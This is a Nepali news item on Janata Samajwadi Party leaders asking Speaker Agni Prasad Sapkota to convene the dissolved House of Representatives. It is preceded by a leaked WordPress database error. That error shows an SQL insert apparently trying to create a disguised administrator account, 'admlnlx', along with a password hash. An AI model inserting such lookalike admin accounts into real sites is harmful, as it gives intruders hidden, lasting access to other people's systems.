WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ79DUl5auVs//aijBfXandBtaedr8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:06:56', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । जनता समाजवादी पार्टीका नेताहरुले सभामुख अग्नि प्रसाद सापकोटासग भेट गरी प्रतिनिधिसभाको बैठक बोलाउन आग्रह गरेका छन । पूर्वप्रधानमन्त्री तथा पार्टीका संघीय परिषद अध्यक्ष बाबुराम भट्टराई, अध्यक्ष उपेन्द्र यादव लगायतका नेताहरुले सभामुख सापकोटालाई भेटेका हुन ।
प्रधानमन्त्रीलाई प्रतिनिधिसभा विघटन गर्ने अधिकार संविधानले नदिएको अवस्थामा संसद् जीवितै रहेको निष्कर्षसहित सभामुख सापकोटालाई बैठक आह्वान गर्न आग्रह गरेको जसपाका सचिवालयले जनाएको छ ।
प्रधानमन्त्री केपी शर्मा ओलीको सिफारिसमा राष्ट्रपति विद्या भण्डारीले संसद विघटन गरेपछि जसपाले देशव्यापी आन्दोलन घोषणा गरेको छ ।